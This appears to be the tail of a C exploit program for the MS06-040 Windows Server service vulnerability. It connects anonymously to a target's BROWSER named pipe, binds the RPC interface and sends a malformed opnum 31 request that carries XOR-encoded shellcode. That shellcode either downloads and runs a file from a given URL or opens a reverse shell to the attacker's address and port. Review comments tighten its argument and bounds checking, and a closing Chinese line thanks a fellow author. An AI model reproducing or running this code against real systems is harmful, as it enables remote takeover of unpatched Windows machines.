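        memcpy(LargeBuffer + 24 + 32, sc, Sc_len);
    }
    ok = TransactNamedPipe(PipeHandle, LargeBuffer, 24 + datalen, rbuf, sizeof(rbuf), &dw, NULL);
    if (!ok) {
        printf("[*] TransactNamedPipe failed (error %lu); the target may have stopped answering\n",
               (unsigned long)GetLastError());
    }
    free(LargeBuffer);
    return ok ? 0 : -1;
}

/*
 * Prepare the payload and send the malformed request over the bound pipe.
 *
 * PipeHandle  pipe opened by main() and bound by BindRpcInterface()
 * paramstr    download URL (type == 0) or reverse-connect IPv4 address
 *             (type != 0).  A single-character string means "inject nothing":
 *             the stub is sent exactly as stored in Data2000 / Dataxp.
 * i           target selector: 1 = Windows 2000 stub (Data2000, sent once),
 *             2 = Windows XP stub (Dataxp, sent twice as in the original)
 * port        reverse-connect port in host order; only used when type != 0
 * type        0 = download-and-execute payload built by makecode(),
 *             anything else = reverse shell from connectbacksc
 *
 * Returns 0 once the request(s) have been handed to the pipe, -1 on an
 * argument error (unknown os type, unparsable address, payload that does not
 * fit).  makecode() itself exits the process when it cannot encode the URL.
 *
 * Changes from the original: the os type is validated (an unknown value used
 * to return silently after doing nothing), inet_addr() failure is caught,
 * WSAStartup() is checked and paired with WSACleanup(), and -- the important
 * one -- Sc_len is checked against the room left in the stub.  The original
 * copied Sc_len bytes to offset 32 of a 24+1128 (or 24+772) byte heap buffer
 * with no bound, so a long URL overran the buffer.
 */
int Attack(HANDLE PipeHandle, char *paramstr, int i, unsigned short port, int type)
{
    struct RPCFUNC RPCOP;
    WSADATA wsa;
    unsigned long ip = 0;
    unsigned short nport;
    const BYTE *data = NULL;
    unsigned int datalen = 0;       /* stub bytes that follow the 24-byte header */
    int inject = (strlen(paramstr) != 1);
    int rc = 0;

    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {
        fprintf(stderr, "[-] WSAStartup failed\n");
        return -1;
    }

    /* Pick the stub first so a bad os type fails before any payload is built. */
    if (i == 1) {                   /* Windows 2000 */
        data = Data2000;
        datalen = 1128;             /* == sizeof(Data2000) - 1: the string literal adds a NUL */
    } else if (i == 2) {            /* Windows XP */
        data = Dataxp;
        datalen = 772;              /* == sizeof(Dataxp) - 1 */
    } else {
        fprintf(stderr, "[-] unknown os type %d (expected 1 or 2)\n", i);
        WSACleanup();
        return -1;
    }

    if (inject) {
        if (type == 0) {
            makecode(paramstr);     /* fills sc / Sc_len; exits on failure */
        } else {
            ip = inet_addr(paramstr);
            if (ip == INADDR_NONE) {
                fprintf(stderr, "[-] bad reverse address: %s\n", paramstr);
                WSACleanup();
                return -1;
            }
            nport = htons(port);
            /* bytes 160-163 / 166-167 of the stub are the address and port placeholders */
            memcpy(connectbacksc + 160, &ip, 4);
            memcpy(connectbacksc + 166, &nport, 2);
            memcpy(sc, connectbacksc, sizeof(connectbacksc));
            Sc_len = sizeof(connectbacksc);
        }
        /* the payload is written at stub offset 32; it must end inside the stub */
        if (Sc_len > datalen - 32) {
            fprintf(stderr, "[-] payload is %u bytes but only %u fit in the stub\n",
                    Sc_len, datalen - 32);
            WSACleanup();
            return -1;
        }
    }

    memcpy(&RPCOP, POP, sizeof(RPCOP));
    RPCOP.Opnum = 31;
    RPCOP.FragLength = (WORD)(sizeof(RPCOP) + datalen);   /* header + stub */
    RPCOP.AllocHint = datalen;

    printf("^_^Mika is telling you:don't play with fire!^o^\n\n");
    if (i == 1) {
        printf("Sending payload...\n");
        rc = send_request(PipeHandle, &RPCOP, data, datalen, inject);
    } else {
        /* the XP stub is sent twice, as in the original; the reason is not stated there */
        printf("Sending payload1...finish\n");
        rc = send_request(PipeHandle, &RPCOP, data, datalen, inject);
        printf("Sending payload2...finish\n");
        if (send_request(PipeHandle, &RPCOP, data, datalen, inject) != 0) {
            rc = -1;
        }
    }

    WSACleanup();
    return rc;
}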
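/*
 * Build the download-and-execute payload in the global sc buffer.
 *
 * The stub in shellcodenew is copied first, url is appended directly after
 * it (over the string-literal NUL, so the zeroed buffer supplies the URL's
 * terminator), and every byte from DECODE_LEN onward is XOR-encoded with the
 * first key in 0xFF..0x01 for which no encoded byte is on the bad-character
 * list below.  The total length is then stored as a 16-bit value at
 * SC_LEN_OFFSET and the key at ENC_KEY_OFFSET.  Sets Sc_len.
 *
 * Exits the process when no key works (as the original did) and -- new --
 * when the URL would not fit: the original copied strlen(url) bytes into the
 * 1024-byte sc with no bound, so a URL longer than about 726 characters
 * overran it before Attack() ever saw the length.
 *
 * NOTE(review): the bytes patched into the stub itself (length at 8-9, key
 * at 13) are not checked against the bad-character list; only indices
 * DECODE_LEN..Sc_len-1 are.  Kept as in the original.
 */
void makecode(char *url)
{
    unsigned int Enc_key = ENC_KEY;
    unsigned int i, j;
    int bad_found = 1;              /* stays set if no key survives the scan */
    size_t urllen = strlen(url);
    /* stub (with its NUL), the URL, and the two trailing bytes the original counts */
    size_t maxurl = sizeof(sc) - sizeof(shellcodenew) - 2;

    if (urllen > maxurl) {
        fprintf(stderr, "[-] URL too long (%u bytes, at most %u)\n",
                (unsigned)urllen, (unsigned)maxurl);
        exit(-1);
    }

    Sc_len = (unsigned int)(sizeof(shellcodenew) + urllen + 2);
    ZeroMemory(sc, sizeof(sc));
    memcpy(sc, shellcodenew, sizeof(shellcodenew));
    memcpy(sc + sizeof(shellcodenew) - 1, url, urllen);

    for (i = 0xff; i > 0; i--) {
        bad_found = 0;
        for (j = DECODE_LEN; j < Sc_len; j++) {
            unsigned char enc = (unsigned char)(sc[j] ^ i);
            /* bad characters: % = ? @ NUL CR LF \ _ . / */
            if (enc == 0x26 || enc == 0x3d || enc == 0x3f || enc == 0x40 ||
                enc == 0x00 || enc == 0x0D || enc == 0x0A || enc == 0x5c ||
                enc == 0x5f || enc == 0x2e || enc == 0x2f) {
                bad_found = 1;      /* this key produces a bad byte; try the next one */
                break;
            }
        }
        if (!bad_found) {
            Enc_key = i;
            printf("[+] Find XOR Byte: 0x%02X\n", i);
            for (j = DECODE_LEN; j < Sc_len; j++) {
                sc[j] ^= Enc_key;
            }
            break;
        }
    }

    if (bad_found) {
        printf("[-] No xor byte found!\r\n");
        exit(-1);
    }

    /* patch the decoder stub with the encoded length and the key */
    *(unsigned short *)&sc[SC_LEN_OFFSET] = (unsigned short)Sc_len;
    sc[ENC_KEY_OFFSET] = (unsigned char)Enc_key;
}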


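/*
 * Entry point.
 *
 *   ms06040rpc <host> <download url> <os type>
 *   ms06040rpc <host> <reverse addr> <reverse port> <os type>
 *
 * os type: 1 = Windows 2000 SP4 stub, 2 = Windows XP SP1 stub.
 *
 * Makes an anonymous (empty user/password) connection to <host>\pipe, opens
 * <host>\pipe\BROWSER, binds the 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
 * interface and hands off to Attack().  Returns 1 on a usage or argument
 * error, 2 when the pipe cannot be opened or bound, 0 otherwise.
 *
 * Changes from the original: the argument count is checked exactly (extra
 * arguments used to be silently treated as the download form), the os type
 * and port are parsed with strtol() and range-checked instead of atoi(),
 * NETRESOURCE is zero-initialised, the results of WNetAddConnection2(),
 * CreateFile() and BindRpcInterface() are checked, and the pipe handle is
 * closed.
 *
 * NOTE(review): as printed on this page the pipe formats read "%s//pipe",
 * i.e. "%s\pipe" once the lost backslashes are restored, which means <host>
 * has to be given in UNC form (\\host).  If the page also dropped leading
 * backslashes the original may have been "\\\\%s\\pipe" -- confirm against
 * a clean copy.
 */
int main(int argc, char *argv[])
{
    char *server;
    NETRESOURCE nr = {0};           /* the original left the unused members uninitialised */
    char unc[MAX_PATH];
    char szPipe[MAX_PATH];
    HANDLE hFile;
    DWORD err;
    long ostype;
    long port = 0;
    char *end = NULL;

    if (argc != 4 && argc != 5) {
        printf(">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n");
        printf("\t\t rewritten by superlone@eviloctal.com\n");
        printf(">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n\n");
        printf("Usage: %s <host> <download url> <os type>\n\n", argv[0]);
        printf("\t%s <host> <reverse addr> <reverse port> <os type>\n\n", argv[0]);
        printf(" <download url>:\n\t\tsuch as:http://192.168.0.128/test.exe\n\n");
        printf("<reverse addr>:\n\t\tyour host ip address\n\n");
        printf("<reverse port>:\n\t\tyour host listening port\n\n");
        printf("<os type(1/2)>:\n\t\t 1: win 2000sp4 2:win xpsp1\n\n");
        printf("^_^Mika is telling you:don't play with fire!\n");
        return 1;
    }

    /* the os type is the last argument in both forms */
    ostype = strtol(argv[argc - 1], &end, 10);
    if (end == argv[argc - 1] || *end != '\0' || (ostype != 1 && ostype != 2)) {
        fprintf(stderr, "[-] os type must be 1 (win 2000sp4) or 2 (win xpsp1), got '%s'\n", argv[argc - 1]);
        return 1;
    }
    if (argc == 5) {
        port = strtol(argv[3], &end, 10);
        if (end == argv[3] || *end != '\0' || port < 1 || port > 65535) {
            fprintf(stderr, "[-] reverse port must be 1..65535, got '%s'\n", argv[3]);
            return 1;
        }
    }

    server = argv[1];
    _snprintf(unc, sizeof(unc), "%s\\pipe", server);
    unc[sizeof(unc) - 1] = 0;
    nr.dwType = RESOURCETYPE_ANY;
    nr.lpLocalName = NULL;
    nr.lpRemoteName = unc;
    nr.lpProvider = NULL;
    /* anonymous connect; a failure is reported but not fatal, because the
     * pipe open below may still succeed with an existing session */
    err = WNetAddConnection2(&nr, "", "", 0);
    if (err != NO_ERROR) {
        printf("[*] WNetAddConnection2 to %s failed (error %lu), trying the pipe anyway\n",
               unc, (unsigned long)err);
    }

    _snprintf(szPipe, sizeof(szPipe), "%s\\pipe\\BROWSER", server);
    szPipe[sizeof(szPipe) - 1] = 0;
    hFile = CreateFile(szPipe, GENERIC_READ | GENERIC_WRITE, 0, NULL,
                       OPEN_EXISTING, 0, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        fprintf(stderr, "[-] cannot open %s (error %lu)\n", szPipe, (unsigned long)GetLastError());
        return 2;
    }

    if (BindRpcInterface(hFile, "4b324fc8-1670-01d3-1278-5a47bf6ee188", "3.0") != 0) {
        fprintf(stderr, "[-] RPC bind failed, not sending the request\n");
        CloseHandle(hFile);
        return 2;
    }

    if (argc == 5) {
        /* reverse shell: <reverse addr> <reverse port> <os type> */
        Attack(hFile, argv[2], (int)ostype, (unsigned short)port, 1);
    } else {
        /* download-and-execute: <download url> <os type> */
        Attack(hFile, argv[2], (int)ostype, 0, 0);
    }
    CloseHandle(hFile);
    return 0;
}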




再次感谢macro哥哥的无私共享,不然俺要写出这么个程序来还得很长的路要走!


  
